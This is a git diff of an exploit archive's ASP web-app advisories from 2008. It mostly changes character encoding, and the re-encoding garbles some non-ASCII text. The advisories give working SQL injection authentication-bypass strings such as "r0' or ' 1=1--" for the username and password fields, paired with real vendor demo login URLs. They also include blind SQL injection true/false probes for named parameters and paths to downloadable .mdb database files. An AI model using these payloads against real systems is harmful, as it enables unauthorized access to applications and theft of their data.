[~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker [~] - [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري + [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري [~] [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller [~] diff --git a/platforms/asp/webapps/7277.txt b/platforms/asp/webapps/7277.txt index aee58a0c4..98ed7707b 100755 --- a/platforms/asp/webapps/7277.txt +++ b/platforms/asp/webapps/7277.txt @@ -1,42 +1,42 @@ -[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ - [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability -  - [~]Vendor: www.activewebsoftwares.com -  - [~]Software: Active Websurvey v 9.1 -  - [~]author: ((я3d D3v!L)) -  - [~] Date: 28.11.2008 -  - [~] Home: www.ahacker.biz -  - [~] contact: N/A +[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ + [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability +  + [~]Vendor: www.activewebsoftwares.com +  + [~]Software: Active Websurvey v 9.1 +  + [~]author: ((я3d D3v!L)) +  + [~] Date: 28.11.2008 +  + [~] Home: www.ahacker.biz +  + [~] contact: N/A [~] -----------------------------{str0ke}------------------------------ -  -  - [~] Exploit: -  - username: r0' or ' 1=1-- - password: r0' or ' 1=1-- -  -  - [~]login 4 d3m0: -  - http://www.activewebsoftwares.com/demoactivewebsurvey/SurveyTaker.asp - - [~]-----------------------------{str0ke}--------------------------------------------------- - - [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker - [~] - [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري - [~] - [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller - [~] - [~] xp10.biz & ahacker.biz - [~] - - [~]-------------------------------------------------------------------------------- +  +  + [~] Exploit: +  + username: r0' or ' 1=1-- + password: r0' or ' 1=1-- +  +  + [~]login 4 d3m0: +  + http://www.activewebsoftwares.com/demoactivewebsurvey/SurveyTaker.asp + + [~]-----------------------------{str0ke}--------------------------------------------------- + + [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker + [~] + [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري + [~] + [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller + [~] + [~] xp10.biz & ahacker.biz + [~] + + [~]-------------------------------------------------------------------------------- # milw0rm.com [2008-11-29] diff --git a/platforms/asp/webapps/7278.txt b/platforms/asp/webapps/7278.txt index 698a0aa07..1e6fe0ae7 100755 --- a/platforms/asp/webapps/7278.txt +++ b/platforms/asp/webapps/7278.txt @@ -1,11 +1,11 @@ -[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ +[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability [~]Vendor: www.activewebsoftwares.com [~]Software: Active Membership v 2 - [~]author: ((я3d D3v!L)) + [~]author: ((я3d D3v!L)) [~] Date: 28.11.2008 @@ -30,7 +30,7 @@ [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker [~] - [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري + [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري [~] [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller [~] diff --git a/platforms/asp/webapps/7279.txt b/platforms/asp/webapps/7279.txt index 2ca143fa7..e0f81206e 100755 --- a/platforms/asp/webapps/7279.txt +++ b/platforms/asp/webapps/7279.txt @@ -1,6 +1,6 @@ -[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ - وما أوتيتم من العلم الا قليلا -[~]-------------------------------صدق الله العظيم------------------------------- +[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ + وما أوتيتم من العلم الا قليلا +[~]-------------------------------صدق الله العظيم------------------------------- [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability @@ -8,7 +8,7 @@ [~]Software: eWebquiz v 8 - [~]author: ((я3d D3v!L)) + [~]author: ((я3d D3v!L)) [~] Date: 28.11.2008 @@ -33,7 +33,7 @@ [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker [~] - [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري + [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري [~] [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller [~] diff --git a/platforms/asp/webapps/7280.txt b/platforms/asp/webapps/7280.txt index dce25b5d1..e02921aaf 100755 --- a/platforms/asp/webapps/7280.txt +++ b/platforms/asp/webapps/7280.txt @@ -1,11 +1,11 @@ -[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ +[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability [~]Vendor: www.activewebsoftwares.com [~]Software: Active Newsletter v 4.3 - [~]author: ((я3d D3v!L)) + [~]author: ((я3d D3v!L)) [~] Date: 28.11.2008 @@ -33,7 +33,7 @@ [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker [~] - [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري + [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري [~] [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller [~] diff --git a/platforms/asp/webapps/7281.txt b/platforms/asp/webapps/7281.txt index e39d08e76..3c0e04d9c 100755 --- a/platforms/asp/webapps/7281.txt +++ b/platforms/asp/webapps/7281.txt @@ -1,11 +1,11 @@ -[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ +[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability [~]Vendor: www.activewebsoftwares.com [~]Software: Active Web Mail v 4 - [~]author: ((я3d D3v!L)) + [~]author: ((я3d D3v!L)) [~] Date: 28.11.2008 @@ -33,7 +33,7 @@ [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker [~] - [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري + [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري [~] [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller [~] diff --git a/platforms/asp/webapps/7282.txt b/platforms/asp/webapps/7282.txt index c40eece3d..aa67a7306 100755 --- a/platforms/asp/webapps/7282.txt +++ b/platforms/asp/webapps/7282.txt @@ -1,11 +1,11 @@ -[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ +[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability [~]Vendor: www.activewebsoftwares.com [~]Software: Active Trade v 2 - [~]author: ((я3d D3v!L)) + [~]author: ((я3d D3v!L)) [~] Date: 28.11.2008 @@ -33,7 +33,7 @@ [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker [~] - [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري + [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري [~] [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller [~] diff --git a/platforms/asp/webapps/7283.txt b/platforms/asp/webapps/7283.txt index 8629f30f5..3adc0fb50 100755 --- a/platforms/asp/webapps/7283.txt +++ b/platforms/asp/webapps/7283.txt @@ -1,11 +1,11 @@ -[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ +[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability [~]Vendor:www.activewebsoftwares.com [~]Software: Active Price Comparison v 4 - [~]author: ((я3d D3v!L)) + [~]author: ((я3d D3v!L)) [~] Date: 28.11.2008 @@ -30,7 +30,7 @@ [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker [~] - [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري + [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري [~] [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller [~] diff --git a/platforms/asp/webapps/7287.txt b/platforms/asp/webapps/7287.txt index d05a7d367..0167bba4e 100755 --- a/platforms/asp/webapps/7287.txt +++ b/platforms/asp/webapps/7287.txt @@ -1,11 +1,11 @@ -[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ +[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ [~]Tybe:(VoteHistory.asp AccountID) Blind SQL Injection Vulnerability [~]Vendor:www.activewebsoftwares.com [~]Software: ActiveVotes v 2.2 - [~]author: ((я3d D3v!L)) + [~]author: ((я3d D3v!L)) [~] Date: 28.11.2008 @@ -29,9 +29,9 @@ [~]-------------------------------------------------------------------------------- - [~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري + [~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري [~] - [~] spechial thanks : dolly & 7am3m & عماد & {str0ke} + [~] spechial thanks : dolly & 7am3m & عماد & {str0ke} [~] [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller [~] diff --git a/platforms/asp/webapps/7288.txt b/platforms/asp/webapps/7288.txt index 891f011d6..a0bd2a2f2 100755 --- a/platforms/asp/webapps/7288.txt +++ b/platforms/asp/webapps/7288.txt @@ -1,11 +1,11 @@ -[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ +[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ [~]Tybe:(emails.aspx TabOpenQuickTab1) Blind SQL Injection Vulnerability [~]Vendor:www.activewebsoftwares.com [~]Software: Active Web Mail v 4 - [~]author: ((я3d D3v!L)) + [~]author: ((я3d D3v!L)) [~] Date: 28.11.2008 @@ -24,9 +24,9 @@ www.activewebsoftwares.com/DemoActiveWebmail/addressbook.aspx?TabOpenQuickTab1={str0ke} - oя + oя - www.activewebsoftwares.com/DemoActiveWebmail/emails.aspx?TabOpenQuickTab1=((я3d D3v!L)) + www.activewebsoftwares.com/DemoActiveWebmail/emails.aspx?TabOpenQuickTab1=((я3d D3v!L)) [~] 8L!/\/D: @@ -40,7 +40,7 @@ f4L53: addressbook.aspx?TabOpenQuickTab1=1 and 1=2 - 0я + 0я 7Ru3 : emails.aspx?TabOpenQuickTab1=1 and 1=1 @@ -54,9 +54,9 @@ just let your m1nd breath ;) [~]-------------------------------------------------------------------------------- - [~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري + [~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري [~] - [~] spechial thanks : dolly & 7am3m & عماد & {str0ke} + [~] spechial thanks : dolly & 7am3m & عماد & {str0ke} [~] [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller [~] diff --git a/platforms/asp/webapps/7293.txt b/platforms/asp/webapps/7293.txt index ab27b5c16..ce74dd3e0 100755 --- a/platforms/asp/webapps/7293.txt +++ b/platforms/asp/webapps/7293.txt @@ -18,21 +18,21 @@ ++ [ Active Web Helpdesk v 2 (Auth Bypass) SQL Injection Vulnerability ] ++ +--------------------------------------------------------------------------------------------------------------------------------------------------------++ : Author : Cyber-Zone ( Abdelkhalek ) : : : -¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ -¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ -¦ TeaM : Mor0ccan nightamres ¦ ¦ ¦ -¦ Script : http://activewebsoftwares.com ¦ ¦ ![ ]! ¦ -¦ Download : http://activewebsoftwares.com/P12_ActiveWebHelpdesk.aspx?Tabopen= ¦ ¦ ¦ -¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ -¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ -¦ From The Dark Side Of MoroCCo ++ +¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ +¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ +¦ TeaM : Mor0ccan nightamres ¦ ¦ ¦ +¦ Script : http://activewebsoftwares.com ¦ ¦ ![ ]! ¦ +¦ Download : http://activewebsoftwares.com/P12_ActiveWebHelpdesk.aspx?Tabopen= ¦ ¦ ¦ +¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ +¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ +¦ From The Dark Side Of MoroCCo ++ +--------------------------------------------------------------------------------------------------------------------------------------------------------++ : : -¦ Remember : ¦ -¦ ------------- ¦ -¦ ¦ -¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦ -¦ ¦ +¦ Remember : ¦ +¦ ------------- ¦ +¦ ¦ +¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦ +¦ ¦ ++--------------------------------------------------------------------------------------------------------------------------------------------------------+ ++ [!] RaHa NaYda NoooooooooooD ; Anti-Connexion Den MouK [!] ++ diff --git a/platforms/asp/webapps/7295.txt b/platforms/asp/webapps/7295.txt index 7fdca81b5..7e2531a57 100755 --- a/platforms/asp/webapps/7295.txt +++ b/platforms/asp/webapps/7295.txt @@ -1,11 +1,11 @@ -[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ +[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ [~]Tybe:(questions.asp QuizID) Blind SQL Injection Vulnerability [~]Vendor:www.activewebsoftwares.com [~]Software: Active Test v 2.1 - [~]author: ((я3d D3v!L)) + [~]author: ((я3d D3v!L)) [~] Date: 28.11.2008 @@ -24,9 +24,9 @@ www.activewebsoftwares.com/demoactivetest/importquestions.asp?QuizID={str0ke} - oя + oя - www.activewebsoftwares.com/demoactivetest/quiztakers.asp?QuizID=((я3d D3v!L)) + www.activewebsoftwares.com/demoactivetest/quiztakers.asp?QuizID=((я3d D3v!L)) [~] 8L!/\/D: @@ -40,7 +40,7 @@ f4L53: importquestions.asp?QuizID=1 and 1=2 - 0я + 0я 7Ru3 : quiztakers.asp?QuizID=1 and 1=1 @@ -54,9 +54,9 @@ just let your m1nd breath ;) [~]-------------------------------------------------------------------------------- - [~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري + [~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري [~] - [~] spechial thanks : dolly & 7am3m & عماد & {str0ke} + [~] spechial thanks : dolly & 7am3m & عماد & {str0ke} [~] [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller [~] diff --git a/platforms/asp/webapps/7326.txt b/platforms/asp/webapps/7326.txt index 89f54dd38..f72c31bc8 100755 --- a/platforms/asp/webapps/7326.txt +++ b/platforms/asp/webapps/7326.txt @@ -1,4 +1,4 @@ -[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ +[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ [~]Tybe:(pics_pre.asp ID) Blind SQL Injection Vulnerability @@ -6,7 +6,7 @@ [~]Software: Gallery MX - [~]author: ((я3d D3v!L)) + [~]author: ((я3d D3v!L)) [~] Date: 28.11.2008 diff --git a/platforms/asp/webapps/7327.txt b/platforms/asp/webapps/7327.txt index 58b16470c..809594d2b 100755 --- a/platforms/asp/webapps/7327.txt +++ b/platforms/asp/webapps/7327.txt @@ -1,4 +1,4 @@ -[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ +[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ [~]Tybe:(calendar_Eventupdate.asp ID) Blind SQL Injection Vulnerability @@ -6,7 +6,7 @@ [~]Software: Calendar Mx Professional - [~]author: ((я3d D3v!L)) + [~]author: ((я3d D3v!L)) [~] Date: 28.11.2008 diff --git a/platforms/asp/webapps/7340.txt b/platforms/asp/webapps/7340.txt index 3402dedf1..68fa61e16 100755 --- a/platforms/asp/webapps/7340.txt +++ b/platforms/asp/webapps/7340.txt @@ -15,7 +15,7 @@ # D0rk : "powered by easy-news.org" # # ------------------------------- -# Mitrovica është Kosovë, Kosova është Shqiperi - Etnic ALBANIA (H) +# Mitrovica është Kosovë, Kosova është Shqiperi - Etnic ALBANIA (H) # Proud 2 Be MUSLIM ! # Proud 2 Be ALBANIAN ! # Boyle aciklarida yayinliyosan yuh a.g diff --git a/platforms/asp/webapps/7371.txt b/platforms/asp/webapps/7371.txt index 708a6c1ad..656b3e24e 100755 --- a/platforms/asp/webapps/7371.txt +++ b/platforms/asp/webapps/7371.txt @@ -1,6 +1,6 @@ #################################################################################################### # Professional Download Assistant (downloads.mdb) Database Disclosure Vulnerability # -# © Ghost Hacker - REAL-H.COM # +# © Ghost Hacker - REAL-H.COM # #################################################################################################### #[~] Author : Ghost Hacker # #[~] Homepage : http://Real-h.com # diff --git a/platforms/asp/webapps/7372.txt b/platforms/asp/webapps/7372.txt index b429d5a44..9066e41d7 100755 --- a/platforms/asp/webapps/7372.txt +++ b/platforms/asp/webapps/7372.txt @@ -1,6 +1,6 @@ #################################################################################################### # Ikon AdManager 2.1 (ikonBAnner_AdManager.mdb) Database Disclosure Vulnerability # -# © Ghost Hacker - REAL-H.COM # +# © Ghost Hacker - REAL-H.COM # #################################################################################################### #[~] Author : Ghost Hacker # #[~] Homepage : http://Real-h.com # diff --git a/platforms/asp/webapps/7376.txt b/platforms/asp/webapps/7376.txt index 0860143f8..38d40c1e8 100755 --- a/platforms/asp/webapps/7376.txt +++ b/platforms/asp/webapps/7376.txt @@ -1,6 +1,6 @@ #################################################################################################### # QMail Mailing List Manager 1.2 (qmail.mdb) Database Disclosure Vulnerability # -# © Ghost Hacker - REAL-H.COM # +# © Ghost Hacker - REAL-H.COM # #################################################################################################### #[~] Author : Ghost Hacker # #[~] Homepage : http://Real-h.com # diff --git a/platforms/asp/webapps/7419.txt b/platforms/asp/webapps/7419.txt index ca5621183..090b12144 100755 --- a/platforms/asp/webapps/7419.txt +++ b/platforms/asp/webapps/7419.txt @@ -18,21 +18,21 @@ ++ [ColdFusion Scripts evCal Events Calendar Remote Database Disclosure Vulnerability] ++ +--------------------------------------------------------------------------------------------------------------------------------------------------------++ : Author : Cyber-Zone ( Abdelkhalek ) : : : -¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ -¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ -¦ From : MoroCCo ¦ ¦ ¦ -¦ Script : http://www.funscripts.net/old_coldfusion/ ¦ ¦ ![ ]! ¦ -¦ Download : http://www.funscripts.net/old_coldfusion/download.php?fname=evcal ¦ ¦ ¦ -¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ -¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ -¦ From The Dark Side Of MoroCCo ++ +¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ +¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ +¦ From : MoroCCo ¦ ¦ ¦ +¦ Script : http://www.funscripts.net/old_coldfusion/ ¦ ¦ ![ ]! ¦ +¦ Download : http://www.funscripts.net/old_coldfusion/download.php?fname=evcal ¦ ¦ ¦ +¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ +¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ +¦ From The Dark Side Of MoroCCo ++ +--------------------------------------------------------------------------------------------------------------------------------------------------------++ : : -¦ Remember : ¦ -¦ ------------- ¦ -¦ ¦ -¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦ -¦ ¦ +¦ Remember : ¦ +¦ ------------- ¦ +¦ ¦ +¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦ +¦ ¦ ++--------------------------------------------------------------------------------------------------------------------------------------------------------+ ++ [!] Mabrouk 3idkom [!] ++ diff --git a/platforms/asp/webapps/7423.txt b/platforms/asp/webapps/7423.txt index d5d990354..312892e6f 100755 --- a/platforms/asp/webapps/7423.txt +++ b/platforms/asp/webapps/7423.txt @@ -1,28 +1,28 @@ -[☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرحمن الرحيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢ +[☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرحمن الرحيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢ [~] Tybe:(Auth Bypass) Remote SQL Injection Vulnerability [~] Vendor: www.adserversolutions.com - [☠] Software: Affiliate Software Java 4.0 + [☠] Software: Affiliate Software Java 4.0 - [☠] author: ((я3d D3v!L)) + [☠] author: ((я3d D3v!L)) - [☠] Date: 12.12.2008 + [☠] Date: 12.12.2008 - [☠] Home: www.ahacker.biz + [☠] Home: www.ahacker.biz - [☠] contact: N/A + [☠] contact: N/A -[☠] ☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠ +[☠] ☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠ - [☠] Exploit: + [☠] Exploit: - ☠ username: r0' or ' 1=1-- - ☠ password: r0' or ' 1=1-- + ☠ username: r0' or ' 1=1-- + ☠ password: r0' or ' 1=1-- - [☠]login 4 d3m0: + [☠]login 4 d3m0: http://www.adserversolutions.com/affiliate_java/logon.jsp diff --git a/platforms/asp/webapps/7424.txt b/platforms/asp/webapps/7424.txt index 302fbc1c6..95fa7330b 100755 --- a/platforms/asp/webapps/7424.txt +++ b/platforms/asp/webapps/7424.txt @@ -1,4 +1,4 @@ -[☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرحمن الرحيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢ +[☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرحمن الرحيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢ [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability @@ -6,7 +6,7 @@ [~]Software: Ad Management Java - [~]author: ((я3d D3v!L)) + [~]author: ((я3d D3v!L)) [~] Date: 28.11.2008 @@ -14,7 +14,7 @@ [~] contact: N/A -[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠ +[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠ [~] Exploit: @@ -22,7 +22,7 @@ [~] password: r0' or ' 1=1-- - [☠] login 4 d3m0: + [☠] login 4 d3m0: www.adserversolutions.com/admgmt_460/logon.jsp diff --git a/platforms/asp/webapps/7425.txt b/platforms/asp/webapps/7425.txt index 387defcca..592a4850e 100755 --- a/platforms/asp/webapps/7425.txt +++ b/platforms/asp/webapps/7425.txt @@ -1,4 +1,4 @@ -[☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرحمن الرحيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢ +[☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرحمن الرحيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢ [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability @@ -6,7 +6,7 @@ [~]Software: Banner Exchange Java - [~]author: ((я3d D3v!L)) + [~]author: ((я3d D3v!L)) [~] Date: 28.11.2008 @@ -14,7 +14,7 @@ [~] contact: N/A -[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠ +[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠ [~] Exploit: @@ -22,7 +22,7 @@ [~] password: r0' or ' 1=1-- - [☠]login 4 d3m0: + [☠]login 4 d3m0: www.adservingsolutions.com/xchange_java/logon_license.jsp diff --git a/platforms/asp/webapps/7440.txt b/platforms/asp/webapps/7440.txt index 477210e0d..083a833b2 100755 --- a/platforms/asp/webapps/7440.txt +++ b/platforms/asp/webapps/7440.txt @@ -18,21 +18,21 @@ ++ [ColdFusion Scripts Red_Reservations Remote Database Disclosure Vulnerability] ++ +--------------------------------------------------------------------------------------------------------------------------------------------------------++ : Author : Cyber-Zone ( Abdelkhalek ) : : : -¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ -¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ -¦ From : MoroCCo ¦ ¦ ¦ -¦ Script : http://www.funscripts.net/old_coldfusion/ ¦ ¦ ![ ]! ¦ -¦ Download : http://www.funscripts.net/old_coldfusion/download.php?fname=makered ¦ ¦ ¦ -¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ -¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ -¦ From The Dark Side Of MoroCCo ++ +¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ +¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ +¦ From : MoroCCo ¦ ¦ ¦ +¦ Script : http://www.funscripts.net/old_coldfusion/ ¦ ¦ ![ ]! ¦ +¦ Download : http://www.funscripts.net/old_coldfusion/download.php?fname=makered ¦ ¦ ¦ +¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ +¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ +¦ From The Dark Side Of MoroCCo ++ +--------------------------------------------------------------------------------------------------------------------------------------------------------++ : : -¦ Remember : ¦ -¦ ------------- ¦ -¦ ¦ -¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦ -¦ ¦ +¦ Remember : ¦ +¦ ------------- ¦ +¦ ¦ +¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦ +¦ ¦ ++--------------------------------------------------------------------------------------------------------------------------------------------------------+ ++ [!] Mabrouk 3idkom [!] ++ diff --git a/platforms/asp/webapps/7450.txt b/platforms/asp/webapps/7450.txt index f14c85478..8ea763030 100755 --- a/platforms/asp/webapps/7450.txt +++ b/platforms/asp/webapps/7450.txt @@ -1,6 +1,6 @@ #################################################################################################### # FreeForum Database Disclosure Vulnerability # -# © Ghost Hacker - REAL-H.COM # +# © Ghost Hacker - REAL-H.COM # #################################################################################################### #[~] Author : Ghost Hacker # #[~] Homepage : http://Real-h.com # diff --git a/platforms/asp/webapps/7665.txt b/platforms/asp/webapps/7665.txt index 380c80c44..92d5b150b 100755 --- a/platforms/asp/webapps/7665.txt +++ b/platforms/asp/webapps/7665.txt @@ -57,7 +57,7 @@ http://www.siteadi.com/[PATH]/Pack/bad/acc.mdb #http://www.siteadi.com/[PATH]/panel/Login.asp -[~]İşinize Baqın :=) +[~]Ä°ÅŸinize Baqın :=) #Greetz For Kralz & Silent & B~S & C4team.OrG Members ########################################################################### diff --git a/platforms/asp/webapps/7666.txt b/platforms/asp/webapps/7666.txt index c5b4ab9c8..7c30c6b8d 100755 --- a/platforms/asp/webapps/7666.txt +++ b/platforms/asp/webapps/7666.txt @@ -11,14 +11,14 @@ Ayemsis Emlak Pro(Auth Bypass) SQL Injection Vulnerability [~]Exploit: -[~]Yürü /[path]/panel/Login.asp +[~]Yürü /[path]/panel/Login.asp [~]username : ' or '1=1 [~]password : ' or '1=1 -İşinize Baqın :=) +Ä°ÅŸinize Baqın :=) # milw0rm.com ############################################# diff --git a/platforms/asp/webapps/7744.txt b/platforms/asp/webapps/7744.txt index 05cc82c57..450f2630e 100755 --- a/platforms/asp/webapps/7744.txt +++ b/platforms/asp/webapps/7744.txt @@ -16,18 +16,18 @@ Virtual GuestBook v2.1 Remote Database Disclosure Vulnerability ============================================================================== - [»] Script: [ Virtual GuestBook v2.1 ] - [»] Language: [ ASP ] - [»] Website: [ http://www.minitdesign.com/vgbook.asp ] - [»] Founder: [ Moudi ] - [»] Thanks to: [ MiZoZ , ZuKa , str0ke , and all hackers... ] - [»] Team: [ EvilWay ] + [»] Script: [ Virtual GuestBook v2.1 ] + [»] Language: [ ASP ] + [»] Website: [ http://www.minitdesign.com/vgbook.asp ] + [»] 